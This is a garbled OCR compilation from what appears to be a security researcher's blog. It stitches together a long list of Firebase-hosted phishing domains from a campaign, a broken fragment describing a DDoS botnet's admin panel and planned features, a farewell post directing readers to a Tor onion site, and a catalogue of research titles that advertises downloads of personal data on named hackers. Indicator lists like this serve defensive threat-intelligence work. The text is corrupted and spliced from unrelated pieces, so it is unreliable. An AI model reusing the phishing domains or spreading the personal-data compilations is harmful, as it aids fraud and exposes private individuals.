Sample rogue and malicious phishing domain portfolio known to have participated in the 
campaign: 


0000.firebaseapp.com 
02a8.web.app 
1ispielmacherbeta.firebaseapp.com 
131023.firebaseapp.com 
144110.firebaseapp.com 
1493735036650.firebaseapp.com 
164200.firebaseapp.com 
177010.firebaseapp.com 
177610.firebaseapp.com 
17cc7.firebaseapp.com 
212820.firebaseapp.com 
abmay-d9b3b.web.app 


abmay2-4abdf.web.app 
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adamlouie-c87d1.firebaseapp.com 
adda-fenase.web.app 
admininstatiles-5e702.firebaseapp.com 
ads-restricted-id.web.app 
aglae-f0665.firebaseapp.com 
ahwma-deObf.web.app 
aironb-70aba.firebaseapp.com 
ajarwebsite-7d033.firebaseapp.com 
all-scanner-cdf80.web.app 
amao-dc021.web.app 
ambitowebapp-2e394.firebaseapp.com 
analytics-6a184.firebaseapp.com 
angular2-hn.firebaseapp.com 
angular/7firestore-155e4.firebaseapp.com 
aniapp-7ddc2.firebaseapp.com 
anna-prone.web.app 
api-project-723816548444 firebaseapp.com 
appeal-form-fb-copyright102872.web.app 
appeal-form-fb-copyright18258.web.app 
appeal-form-fb-copyright187265.web.app 
appeal-page-unpublish-1827589.web.app 
appeal-page-unpublish1107276.web.app 
appeal-page-unpublish118172861.web.app 
appeal-page-unpublish18275.web.app 
appeal-page-unpublish182758.web.app 
appeal-page-unpublish1827586.web.app 
appeal-page-unpublish182759.web.app 
appeal-page-unpublish18278652.web.app 
appeal-page-unpublish1827890.web.app 
appeal-page-unpublish187-36ac4.web.app 
appeal-page-unpublish18769.web.app 
appemailhostingcha2.web.app 
appy-760b5.firebaseapp.com 
ararestaurant1.firebaseapp.com 


arco-website-f9750.firebaseapp.com 
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aruba-postmaster-info.web.app 
asmorx-1f6a2.web.app 
asna-mod.web.app 
ass-mote.web.app 
asse-mofe.web.app 
assets-0161.firebaseapp.com 
atarashii-atsui.web.app 
au-ma-di.web.app 
aude-mofe.web.app 
audiscover-owawebapplications.web.app 
auri-mo-da.web.app 
auth-task1-m.web.app 
auth20-outlook.web.app 
authdemo-177a0.firebaseapp.com 
authenticationuchu23.web.app 
baffe-level.web.app 
bandspace-console.web.app 
baren-od.web.app 
battle-22f22.firebaseapp.com 
benali-acbe6.web.app 
bestofjs-api-v1.firebaseapp.com 
bi-1020101000x0.web.app 
bigbt-aten.web.app 
bingbrossvocalintel.web.app 
bitbaink.web.app 

bithunnb.web.app 
bjqrasuoup.web.app 
blockchain-assets-protection.web.app 
blockchain-recovery-dda4d.web.app 
bmazy2-0.web.app 
bnp-verifi.web.app 
boma-ren.firebaseapp.com 
booking-hotesses-d7920.firebaseapp.com 
bred-authentification-97-7.web.app 


buten-dare.web.app 
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bzbikeruko.web.app 
ca-regionale-department-a.web.app 
cabs-ole.web.app 
cadeau-par-plaisir.web.app 
cale-mothe.web.app 
camoam-d97a4.web.app 
case-ofa.web.app 
case100091254778.web.app 
caseforpage100089481844.web.app 
caseforpages100049151.web.app 
caseforpages108412.web.app 
caseforpages1885777.web.app 
caseforpages1888888.web.app 
caseforpages55222.web.app 
caseforpages/777422.web.app 
caseforpages88174714.web.app 
caten-opa.web.app 
cau-quate.web.app 
cen-kenase.web.app 
cenle-one.web.app 
centre-telephoneproinfo.web.app 
chargement-service.web.app 
chat-b2982.firebaseapp.com 
chat-finpolo.firebaseapp.com 
checkmailsawo5.web.app 
checkmessagerievocalewebtel.web.app 
checksweetmail6.web.app 
cinhatena.web.app 
cloud-space-auth-service.web.app 
clouddoc-authorize.firebaseapp.com 
club-note-vocale.web.app 
code-mesme.web.app 
cogne-menta.web.app 
cojet-mole.web.app 
cokade-made.firebaseapp.com 
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colimat-done.web.app 
colo-mate.web.app 
comasse-unade.web.app 
come-measa.web.app 
companyemailresyncl.web.app 
con-firma.firebaseapp.com 
cones-dore.web.app 
conh-ma.web.app 

cop-ado.web.app 

cope-ilna.web.app 
cora-gas-me.web.app 
cphost-7edd4.web.app 
crawer-sur.web.app 
credit-et-assurance07.web.app 
cres-mate.web.app 
crime-aune.web.app 
crive-cible.web.app 

csen-ted.web.app 

d-validate.web.app 
d3iioor0753gvdbfewypqb64.web.app 
daisma-e7e6c.web.app 
darrin-pendleton-j5286.web.app 
dc4u-6e803.firebaseapp.com 
decdo-chat2.firebaseapp.com 
demachatendi36.web.app 
demoitau-d3428.web.app 
denabere-2c382.web.app 
digital-book-9f870.firebaseapp.com 
dmacenda.web.app 
docsharex-authorize.firebaseapp.com 
docuproject39-277-383-files.firebaseapp.com 
dope-ufen.web.app 
downloadfreeebookspdf-6e806.firebaseapp.com 
downloadpdfreader-d7702.firebaseapp.com 
drafty-43c88.firebaseapp.com 
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driveintuksouteast-falcaopla.web.app 
dropdocument-c3829.web.app 
dskdirect-5ba26.web.app 
dw-website-fbc19.firebaseapp.com 
eagle10.firebaseapp.com 
ebookwngfgewarwle.web.app 
edret-tropm.web.app 

efetgreds.web.app 

eins-done.web.app 
eleven-bot-399b7.web.app 
elimu-cl1a38.firebaseapp.com 
email-mweb-co-za-zimbra-1.firebaseapp.com 
email-update-verify.web.app 
email-verificationservices365.web.app 
empacte-do.web.app 

ems-obe.web.app 
emsi-lobo.firebaseapp.com 
end-losup.web.app 

erfders-f6013.web.app 
esote-mode.web.app 
exness-mobile.web.app 
explore-wetriansfering-web.web.app 
exposedacne.web.app 
fOldgonn.firebaseapp.com 
facebook-appeal1749902610052.web.app 
facebook-appelcase32q1.web.app 
facebookappeal-case10351001.web.app 
facebookappealcase1884888444.web.app 
facebookappealcase7174747444.web.app 
facebookcase187444441.web.app 
facebookcase188444.web.app 
fares-one.web.app 
fb-appeal-form-70f46.web.app 
fb-appeal-form-791bd.web.app 
fb-restricted-d12c2.web.app 
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fobappealform13111.web.app 
foforpages1848151.web.app 
fomail-case199418414.web.app 
fomail-pages100049194.web.app 
fopages-case10004915.web.app 
fema-tode.web.app 
fetfetaa-81119.web.app 
fines-gining.web.app 
firtserverunithpp.web.app 
flape-man.web.app 
flape-odade.web.app 
fmvfhagpab.web.app 
focus-online-news.web.app 
fodes-mota.web.app 
font-makeupe.web.app 
foresta-mod.firebaseapp.com 
foten-moda.web.app 
francesbbv.web.app 
freeebookspdf-9ab41.firebaseapp.com 
freejobsnews-f8cb8.firebaseapp.com 
freis-mode.web.app 
gadjabadjalal.web.app 
gare-train3.web.app 
gene-marso.web.app 
genie-alba.firebaseapp.com 
girly-wallpaper-5b75f.web.app 
godadyxs.web.app 
gomas-12c01.web.app 
gospel-living.web.app 
goswapp-bsc.web.app 
gotan-one.web.app 
gotcha-67060.firebaseapp.com 
grace-bijoux-14910.firebaseapp.com 
green65é6dfbb5f31b1fe48c2391a6.web.app 
gridsend-98f14.web.app 
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groupe-ca-authenticati-caisse.web.app 
groupe-sa-accueil-autnenti.web.app 
gweb-gc-gather-production.firebaseapp.com 
gweb-miyagi.firebaseapp.com 
hagenpau.web.app 

histoire-clik.web.app 
hiworksservicecenter.web.app 
hon-macona.web.app 
hounbvc-c7661.web.app 
hsfkrkqogo.web.app 
httpsaudiscover-owawebapplications.web.app 
httpsdocument-download-902123.web.app 
httpsfyregym-wetransfer.web.app 
httpsjojo-wiza124.web.app 
httpsjoovkuebea.web.app 
httpsminxtex.firebaseapp.com 
httpsprice-per-unit.firebaseapp.com 
httpsprotectmimemimefrem.web.app 
httpsworldvision-419f2.firebaseapp.com 
hunin-one.web.app 

hyle-fo82f.web.app 
info-telephone-vocale.web.app 
international-web-fb75a.web.app 
isfane-osade.web.app 
iydd-1b2d8.web.app 
jams-jamz1234.web.app 
jecta-f45df.firebaseapp.com 
jentame-add.web.app 
jes-mo-sad.web.app 

jex-ulto.web.app 

kaunte-mone.web.app 
kebote-moda.web.app 
kes-mole.web.app 

kodrefse-nsf.web.app 
109162020-fixmailhelpdesk.web.app 
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laefhfdhkdsdv.web.app 
lamaf-50e45.web.app 
les-more.web.app 
Ig-roudcubeblack-access.web.app 
Igeyfuusmg.web.app 
licloud.web.app 
licos-date.web.app 
line-9calc.web.app 
link-bb76d.web.app 
lisen-ocun.web.app 
live-support-82d11.firebaseapp.com 
login-442v3f.web.app 
loginfo-tkconf.web.app 
lohsam-86765.web.app 
lommsrecu3.firebaseapp.com 
lono-jena.web.app 
lote-masme.web.app 
louams-62870.web.app 


Ithouse.web.app 


m-cabanqueenligne-particuliers.web.app 


m-orangebankenligne-id.web.app 
mitechnology.firebaseapp.com 
maedz-5fdff.web.app 
mail-8583e.web.app 
mail-account-verify-f4723.web.app 
mail-lcloud-com-account.web.app 
mail-ovhcloud.web.app 
mansan-4calc.web.app 
may1110genstanbk.web.app 
mbaqbfhfmgr.web.app 
memo-vocale-52636.web.app 
mentipdf.web.app 
mercadolibre-research.web.app 
mms-sms-alert.firebaseapp.com 


mo-aska-da.web.app 
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mobialmysyf.web.app 
mobizzmperb.web.app 
moce-add.web.app 
moce-aude.web.app 
molases-b652e.web.app 
mon-tome.web.app 
msgmessage-7f854.firebaseapp.com 
mswordg.web.app 
mta-round-cube.web.app 
mxflexsub.web.app 
my-bithumb.web.app 
my-winbamk.web.app 
mylogin-config.web.app 
nale-ping.web.app 
name-ocina.web.app 
ne01u59l.firebaseapp.com 
nera-mode.web.app 
netwOrksolutions.web.app 
newlink-c8a8f.web.app 
njnapcdvzc.web.app 
nopin-dod.web.app 
nozed-uname.firebaseapp.com 
ntzmttpmnttoepniant.web.app 
0-orangebank18-id.web.app 
oaism-72827.web.app 
ocaque-domen.firebaseapp.com 
ocuso-aken.web.app 
office-webmail-login-f0e3c.web.app 
officeindex-file.web.app 
officemailsharing-20cd3.web.app 
offices-voicemail.web.app 
oftenas-oweb.web.app 
ojin-madij.web.app 
olet-mado.web.app 


omawo-14b8c.web.app 
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& Cratuctuna Bunga 1 


Cenuac 
Botos : 80 

Botos online: 1 
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Online GoTe! KonMYectBo: 1 
@ 3P-1( 100.00% } 


¥ pac HeT Dead GoToe 


- Dead bots. 


4. Statistics botneta country 

- All countries to work on 

- New work by country 

- Online work from country to country 
- Dead bots by country 

5. Detailed history botneta 


6. Convenient user-friendly interface adding teams 


7. Admin minimal server loads 
- Use php5/mysql 
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on-me-ro.firebaseapp.com 
onee-a0488.web.app 
oneone-19cd8.web.app 
onga-moce.web.app 
onlinepdfkwpmmkl.web.app 
onsa-mode.web.app 
orange-my-app.web.app 
orangesmsprovocale.web.app 
oras-moria.web.app 
oroma-42f59.web.app 
osale-mape.web.app 
osaute-moca.web.app 
others1-f7ce9.web.app 
outline-auth-d7f99.web.app 
outlookloffice365user09ngxsmd.web.app 
outlookloffice365userp86aese6.web.app 
outlooks-userserver.web.app 
owa-signon-officeaccount.web.app 
owablu84349439434.web.app 
owserv220020.web.app 
padma-3fbb8.web.app 
page-appeal-unpublish1253631.web.app 
pagebusiness-copyrightcase1256.web.app 
pay-sera.web.app 
phuongpndev.web.app 

pokajca.web.app 
poltunefrdonecodesms.web.app 
popuyecash7.web.app 
portail-messagerieorangesms.web.app 
postmailservr-panel-centr.web.app 
project2021c-42b13.firebaseapp.com 
pry-ecommerce.web.app 
put-media-lan.web.app 
r-web-2a3a9.web.app 


roc-mainline.web.app 
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roc-verifylogin5.web.app 
rbclogin-line.web.app 
readingwtagzdm.web.app 
recording-c12f5.web.app 
renard-trouillard.web.app 
restore70174-coinbase-us.web.app 
rjabldfrbg.web.app 
romas-512bf.web.app 
rooted-4da8a.web.app 
rouncubemail.web.app 
royalbill-a3y4.web.app 
rufe-sun.web.app 
saal-kejriwal.web.app 
samda-3c88f.web.app 
sarba-one.web.app 
scorchvc.web.app 
scorchvc.web.appO 
serve-8e8dc.web.app 
server-authentication-332e1.web.app 
servercpanel-afal2.web.app 
service-vocalesmsprotelfixe.web.app 
sharebox-onedrive-file-f692f.web.app 
side-esone.web.app 
sim-ote.web.app 
skype-online04171.web.app 
slackchatv1.firebaseapp.com 
snaptik.web.app 
soci-molen.web.app 
sode-mape.web.app 
soden-olma.web.app 
sofe-inchena.web.app 
sofe-tane.web.app 
solen-conda.web.app 
somas-b88a0.web.app 


sone-masa.web.app 
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sonta-maline.web.app 
sore-modabe.web.app 
soure-made.web.app 
sparkassbank-de.web.app 
srey-deocs.web.app 
sroxma-ab2cc.web.app 
sudo-mone.web.app 
sugen-oda.web.app 
sun-maupe.web.app 
sunge-ode.firebaseapp.com 
suone-bena.web.app 
swiftshare-content-auth.web.app 
tittot-a8505.web.app 
tm-etiquetado.web.app 
tome-done.web.app 
totem1.web.app 
totem2.web.app 


tousou-posoto3.web.app 


trdsmccdb7386cbf3ba0b0b8d.web.app 


truein-264db.web.app 
ugen-orabe.web.app 
uiinlcuo370ed.web.app 
un-foreste.web.app 
unt-morelle.web.app 
update-45190ca.web.app 
user-45190ca21.web.app 
userca-58ce4.web.app 
usmin-moda.web.app 
validate-clientrbc.web.app 
vandameman4.web.app 
verberuyer7.web.app 
verif-loginrobc.web.app 
verify-48181.web.app 
verify-user-roc.web.app 


verifywell-85477.web.app 
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vkmqnvyfwd1111.web.app 
vmta-mod.web.app 
vocaleproidorange.web.app 
votre-boitevocale-fixe.firebaseapp.com 
wdfyxklmba.web.app 

web-bf4.web.app 

web-elf6d.web.app 
web874830-98375-90232.web.app 
webmail-a2846.web.app 
webmail-control-9efc7.web.app 
wecluihfrf-76tygh.web.app 
wedpfoaliculate-resmazm.web.app 
westernfoodmaincourse.web.app 
wetranslatetransfers-coxsola.firebaseapp.com 
wetrnafers.web.app 
whatsapp-clone-teamwork.firebaseapp.com 
win-more-0x.web.app 

winx-fbac0O.web.app 
wix-engage-visitors-prod-0.firebaseapp.com 
wix-engage-visitors-prod-10.firebaseapp.com 
wix-engage-visitors-prod-20.firebaseapp.com 
w00923536-902453-908563.web.app 
wraxdne.web.app 

www.firebaseapp.com 

www.web.app 

x0x0x10010-0100.web.app 
x48652.web.app 

xamua-7cb66.web.app 
xcio-O0000auth.web.app 
xm01-18c1f.web.app 
xnN-87487387348739-16aa.web.app 
xtpma4ep.firebaseapp.com 
zoho-active.web.app 
zoho-adminserv.web.app 
zoho-mailservices.web.app 
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zoho-online.web.app 


zoho-validationserv.web.app 


zxtst-44902.firebaseapp.com 
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17.10.20 Introducing Dancho Danchev’s "Intelligence Community" 2.0 Dark Web 
Onion - Exclusive Content Available! (2021-10-18 23:05) 


he 


[1] 
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Dear blog readers, 


It’s been approximately 12 years since I’ve originally launched my Dancho Danchev’s Blog - 
Mind Streams of Information Security Knowledge blog which quickly became one of the 
security industry’s leading publications and since I’ve recently received quite a few 
censorship attempts that basically say that some of my research violates Google’s Terms of 
Service I’ve decided to migrate my personal blog including to resume my research at the 
official Dark Web Onion for this blog which is: 


¢ [2]http://aklw6fojficmu3zqsdsffprbas3kqrheej4ntvynfl5xkrjpqhiq55yd.onion 


and therefore I’ve decided that this is my last post on my personal Dancho Danchev’s Blog. 


Users and readers interested in continuing to follow my research can grab the Tor browser 
and visit - [3]http://aklw6fojficmu3zqsdsffprbas3kqrhe ej4ntvynfl5xkrjpqhiq55yd.onion where 
I’ll ensure that I’ll be posting high-quality and never-published and discussed before research 
and OSINT type of analysis. 


Sample screenshots from my "Intelligence Community" 2.0 Dark Web Onion blog: 


[4] 
18348 


[9] 


Sample content which you can find at the Dark Web Onion: 
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¢ A Compilation of Currently Active and Related Scams Scammer Email Addresses - An OS- 
INT Analysis 


¢ A Compilation of Currently Active Cyber Jihad Themed Personal Email Addresses - An OS- 
INT Analysis 


¢ A Compilation of Currently Active Full Offline Copies of Cybercrime-Friendly Forum Com- 
munities - Direct Technical Collection Download -[RAR] 


¢ A Compilation of Personally Identifiable Information on Various Iran-based Hacker Groups 
and Lone Hacker Teams - Direct Technical Collection Download - [RAR] 


¢ A Koobface Botnet Themed Infographic Courtesy of my Keynote at CyberCamp - A Photo 
¢ Advanced Bulletproof Malicious Infrastructure Investigation - WhoisXML API Analysis 


¢ Advanced Mapping and Reconnaissance of Botnet Command and Control Infrastructure 
using Hostinger’s Legitimate Infrastructure - WhoisXML API Analysis 


¢ Advanced Mapping and Reconnaissance of the Emotet Botnet - WhoisXML API Analysis 


Assessing The Computer Network Operation (CNO) Capabilities of the Islamic Republic of 
Iran - Free Research Report 


Astalavista Security Newsletter - 2003-2006 - Full Offline Reading Copy 


* Compilations of Personally Identifiable Information Including XMPP/Jabber and Personal 
Emails Belonging to Cybercriminals and Malicious Threat Actors Internationally - An OSINT 
Analysis 


Cyber Intelligence - Personal Memoir - Dancho Danchev - - Download Free Copy Today! 


¢ Cybercriminals Impersonate Legitimate Security Researcher Launch a Typosquatting C &C 
Server Campaign - WhoisXML API Analysis 


¢ Dancho Danchev - Cyber Intelligence - Personal Memoir - Direct Download Copy Available 


¢ Dancho Danchev’s “A Qualitative and Technical Collection OSINT-Enriched Analysis of the 
Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security Team” 
Report - [PDF] 


* Dancho Danchev’s “Assessing The Computer Network Operation (CNO) Capabilities of the 
Islamic Republic of Iran” Report - [PDF] 


|” 


¢ Dancho Danchev’s “Astalavista Security Group - Investment Proposal” Presentation - A 


Photos Compilation 


¢ Dancho Danchev’s “Building and Implementing a Successful Information Security Policy” 
White Paper - [PDF] 


* Dancho Danchev’s “Cyber Jihad vs Cyberterrorim - Separating Hype from Reality” Presen- 
tation - [PDF] 


* Dancho Danchev’s “Cyber Jihad vs Cyberterrorism - Separating Hype from Reality - A 
Photos Compilation 
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-9( 11.25% } 


-2 (2.50% } 


FS 6R 
@,p 


Madopmauna o crpaHe 
Country: Japan 
All Bots; 2 


Online Bots: 1 
New Bot 
Dead Bots: 


Upcoming features : 

1. Form grabber (price increase substantially), for old customers will be charged as an 
upgrade 

2. Public key cryptography 

3. Clustering campaigns and DDoS attacks 


Despite it’s proprietary nature, it’s quality and innovative features will sooner or later 
leak out for everyone to take advantage of, a rather common lifecycle for the majority of 
proprietary malware kits in general. 


Related posts: 
[1]BlackEnergy DDoS Bot Web Based 


[2]A New DDoS Malware Kit in the Wild 

[3]The Cyber Bot - Web Based Malware 

[4]The Black Sun Bot - Web Based Malware 
[5]Custom DDoS Capabilities Within a Malware 
[6]Botnet on Demand Service 

[7]Loads.cc - DDoS for Hire Service 

[8]Using Market Forces to Disrupt Botnets 
[9]Botnet Communication Platforms 

[10]A Botnet Master's To-Do List 


[11]DDoS on Demand VS DDoS Extortion 
[12]How Does a Botnet with 100k Infected PCs Look Like? 


pay 


. http: //ddanchev. blogspot .com/2008/02/blackenergy-ddos-bot-web-based-c.htm 


ttp://ddanchev. blogspot .com/2007/09/new-ddos-malware-kit-in-wild.htm 
ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


. http: //ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 


2 
3 
4 
5. 
6, http:/ /adanchev. blogspot .con/2007/10/potnet~on-denand-service. ht 
7 
8 
9 


_netp://adanchev. blogspot .con/7002/03/loadsccs- ddos~for-hire- service hal 
_http://ddanchev, blogepot .con/2008/06/asing-narket~forces-to-disrupt-botnets tal 
_nttp:/ /adenchev. blogspot .con/2007/09/botnet~ communication platforts. neal 

10, ttp: //aanchev blogspot .con/2006/04/botnet-nasters-to-do-List. tall 


. http: //ddanchev. blogspot .com/2008/05/how-does-botnet-with-100k-infected-pcs. html 
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Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - A 
Photos Compilation 


Dancho Danchev’s “Exposing Koobface - The World’s Largest Botnet” Presentation - [PDF] 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” Presen- 
tation - A Photos Compilation 


Dancho Danchev’s “Exposing the Dynamic Money Mule Recruitment Ecosystem” Presen- 
tation - [PDF] 


Dancho Danchev’s “Intell on the Criminal Underground - Who’s Who in Cybercrime for ” 
Presentation - [PDF] 


Dancho Danchev’s “Intell on the Criminal Underground - Who’s Who in Cybercrime for ?” 
- A Photos Compilation 


Dancho Danchev’s - Cybercrime Forum Data Set - Free Direct Technical Collection Down- 
load Available - GB - [RAR] 


Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Blog - Full Offline Copy Available - Volume - [PDF] 
Dancho Danchev’s Comeback Livestream Today - Join me on Facebook Live! 
Dancho Danchev’s CV - Direct Download Copy Available 


Dancho Danchev’s Cybercrime Forum Data Set for - Upcoming Direct Technical Collection 
Download Available 


Dancho Danchev’s Primary Contact Points for this Project - Email/XMPP/Jabber/OMEMO 
and PGP Key Accounts 
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* Dancho Danchev’s Privacy and Security Research Compilation - Medium Account Research 
Compilation - [PDF] 


¢ Dancho Danchev’s Private Party Videos - Direct Video Download Available 

¢ Dancho Danchev’s Private Party Videos - Part Three - Direct Video Download Available 
¢ Dancho Danchev’s Private Party Videos - Part Two - Direct Video Download Available 

¢ Dancho Danchev’s Random Conference and Event Photos - A Compilation 


¢ Dancho Danchev’s Random Personal Photos and Research Photos Compilation - A Compi- 
lation 


* Dancho Danchev’s Research for Unit-.org - Direct Download Copy Available 
* Dancho Danchev’s Research for Webroot - Direct Download Copy Available 
¢ Dancho Danchev’s RSA Europe Conference Event Photos - A Photos Compilation 


¢ Dancho Danchev’s Security Articles and Research for ZDNet’s Zero Day Blog - Full Offline 
Copy Available - [PDF] 


* Dancho Danchev’s Security/OSINT/Cybercrime Research and Threat Intelligence Gather- 
ing Research Compilations - [PDF] 


¢ Dancho Danchev’s Twitter Archive - Direct Download - [ZIP] 


* Dancho Danchev’s Upcoming Cybercrime Research OSINT and Threat Intelligence Gath- 
ering E-Book Titles - Sample E-Book Covers 


¢ Dancho Danchev’s Video Keynote Presentation - “Exposing Koobface - The World’s Largest 
Botnet” - Video Download Available 


¢ Dancho Danchev’s Random Personal Photos and Research Photos Compilation - Part Three 
- A Compilation 


¢ Dancho Danchev’s Random Personal Photos and Research Photos Compilation - Part Two 
- A Compilation 


Exposing A Virus Coding Group - An OSINT Analysis 


¢ Exposing a Boutique Fraudulent and Rogue Cybercrime-Friendly Forum Community - 
WhoisXML API Analysis 


¢ Exposing a Currently Active “Jabber ZeuS” also known as “Aqua ZeuS” Gang Personal 
Email Portfolio - An OSINT Analysis 


¢ Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - An 
OSINT Analysis 


¢ Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part 
Two - An OSINT Analysis 


¢ Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part 
Four - An OSINT Analysis 
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Exposing a Currently Active CoolWebSearch Rogue and Malicious Domains Portfolio - Part 
Three - An OSINT Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious IPs Portfolio - An OSINT 
Analysis 


Exposing a Currently Active CoolWebSearch Rogue and Malicious IPs Portfolio - Part Two - 
An OSINT Analysis 


Exposing a Currently Active Cyber Jihad Domain Portfolio - An OSINT Analysis 
Exposing a Currently Active Cyber Jihad Domains Portfolio - WhoisXML API Analysis 
Exposing a Currently Active Cyber Jihad Social Media Twitter Accounts - An OSINT Analysis 


Exposing a Currently Active Domain Portfolio Belonging to Iran’s Mabna Hackers - An 
OSINT Analysis 


Exposing a Currently Active Domain Portfolio Managed and Operated by Members of the 
Ashiyane Digital Security Team - WhoisXML API Analysis 


Exposing a Currently Active Domain Portfolio of Currently Active High-Profile Cybercrimi- 
nals Internationally - WhoisXML API Analysis 


Exposing A Currently Active Domain Portfolio of Cybercrime Friendly Forum Communities 
- An OSINT Analysis 


Exposing A Currently Active Domain Portfolio of Cybercrime Friendly Forum Communities 
- Part Two - An 


OSINT Analysis 


Exposing A Currently Active Domain Portfolio of Cybercrime Friendly Forum Communities 
- Part Three - An 


OSINT Analysis 


Exposing a Currently Active Domain Portfolio of Tech Support Scam Domains - An OSINT 
Analysis 


Exposing a Currently Active Free Rogue VPN Domains Portfolio Courtesy of the NSA - 
WhoisXML API Analysis 


Exposing a Currently Active Iran-Based Lone Hacker and Hacker Group’s Personal Web 
Sites Full Offline Copies - Direct Technical Collection Download - [RAR] 


Exposing a Currently Active Kaseya Ransomware Domains Portfolio - WhoisXML API Anal- 
ysis 

Exposing a Currently Active Koobface Botnet C &C Server Domains Portfolio - Historical 
OSINT 


Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - An 
OSINT Analysis 


Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - Part 
Two - An OSINT Analysis 


18355 


¢ Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - Part 
Three - An OSINT Analysis 


¢ Exposing a Currently Active List of Iran-Based Hacker and Hacker Team’s Handles - Part 
Two - An OSINT Analysis 


¢ Exposing a Currently Active Money Mule Recruitment Domain Registrant Portfolio - Histor- 
ical OSINT 


¢ Exposing a Currently Active NSO Spyware Group’s Domain Portfolio - WhoisXML API Anal- 
ysis 


¢ Exposing a Currently Active Portfolio of Personal Web Sites Belonging to Iran-Based Hack- 
ers and Hacking Teams and Groups - An OSINT Analysis 


¢ Exposing a Currently Active Portfolio of Personal Web Sites Belonging to Iran-Based Hack- 
ers and Hacking Teams and Groups - Part Two - An OSINT Analysis 


¢ Exposing a Currently Active Portfolio of Ransomware-Themed Protonmail Personal Email 
Address Accounts - An OSINT Analysis 


* Exposing a Currently Active Portfolio of RAT (Remote Access Tool) C &C Server IPs and 
Domains - An OSINT Analysis 


¢ Exposing a Currently Active Rock Phish Domain Portfolio - Historical OSINT 


¢ Exposing a Currently Active SolarWinds Rogue and Malicious C &C Domains Portfolio - An 
OSINT Analysis 


¢ Exposing a Currently Active WannaCry Ransomware Domains Portfolio - WhoisXML API 
Analysis 


¢ Exposing a Personal Photo Portfolio of Iran Hack Security Team - An OSINT Analysis 


¢ Exposing A Personal Photos Portfolio of Ashiyane Digital Security Group Team Members - 
An OSINT Analysis 


¢ Exposing a Personal Ransomware-Themed Email Address Portfolio - An OSINT Analysis 


¢ Exposing a Personal Ransomware-Themed Email Address Portfolio - Part Two - An OSINT 
Analysis 


¢ Exposing a Portfolio of Ashiyane Digital Security Team Hacking Tools - Direct Technical 
Collection Download - [RAR] 


¢ Exposing a Portfolio of Personal Photos of Iran-Based Hacker and Hacker Teams and Groups 
- An OSINT Analysis 


¢ Exposing a Rogue Domain Portfolio of Fake News Sites - WhoisXML API Analysis 


Exposing Bulgarian Cyber Army Hacking Group - An OSINT Analysis 
¢ Exposing HackPhreak Hacking Group - An OSINT Analysis 


Exposing Personally Identifiable Information on Ashiyane Digital Security Group Team 
Members - An OSINT Analysis 
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Exposing Random Koobface Botnet Related Screenshots - An OSINT Analysis 
Exposing Team Code Zero Hacking Group - An OSINT Analysis 


From the “Definitely Busted” Department - A Compilation of Personally Identifiable Infor- 
mation on Various Cyber Threat Actors Internationally - An OSINT Analysis - [PDF] 


Introducing Astalavista.box.sk’s “Threat Crawler” Project - Earn Cryptocurrency for Catch- 
ing the Bad Guys - Hardware Version Available 


Introducing Dancho Danchevs’s “Blog” Android Mobile Application - Google Play Version 
Available 


Malware - Future Trends - Research Paper - Copy 


Person on the U.S Secret Service Most Wanted Cybercriminals Identified Runs a Black 
Energy DDoS Botnet - 


WhoisXML API 
Profiling a Currently Active CoolWebSearch Domains Portfolio - WhoisXML API Analysis 


Profiling a Currently Active Domain Portfolio of Fake Job Proposition and Pharmaceutical 
Scam Domains - An OSINT Analysis 


Profiling a Currently Active Domain Portfolio of Pay-Per-Install Rogue and Fraudulent Affili- 
ate Network Domains - An OSINT Analysis 


Profiling a Currently Active Personal Email Address Portfolio of Members of Iran’s Ashiyane 
Digital Security Team - An OSINT Analysis 


Profiling a Currently Active Personal Email Addresses Portfolio Operated by Cybercriminals 
Internationally - An OSINT Analysis 


Profiling a Currently Active Portfolio of Rogue and Malicious Domains - An OSINT Analysis 


Profiling a Currently Active Portfolio of Scareware and Malicious Domain Registrants - His- 
torical OSINT 


Profiling a Currently Active Portfolio of Scareware Domains - Historical OSINT 


Profiling a Currently Active Portfolio of Soam Domains that Hit ZDNet.com Circa - An OSINT 
Analysis 


Profiling a Currently Active Scareware Domains Portfolio - An OSINT Analysis 
Profiling a Money Mule Recruitment Registrant Emails Portfolio - WhoisXML API Analysis 
Profiling a Portfolio of Cybercriminal Email Addresses - WhoisXML API Analysis 


Profiling a Portfolio of Personal Photos Courtesy of Koobface Botnet Master Anton Ko- 
rotchenko - An OSINT Analysis 


Profiling a Portfolio of Personal Photos of Behrooz Kamalian Team Member of Ashiyane 
Digital Security Team - An OSINT Analysis 


Profiling a Portfolio of Personally Identifiable OSINT Artifacts from Law Enforcement and 
OSINT Operation “Uncle George” - An OSINT Analysis 
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¢ Profiling a Rogue Fast-Flux Botnet Infrastructure Currently Hosting Multiple Online Cyber- 
crime Enterprises - WhoisXML API Analysis 


Profiling Iran’s Hacking Scene Using Maltego - A Practical Case Study and a Qualitative 
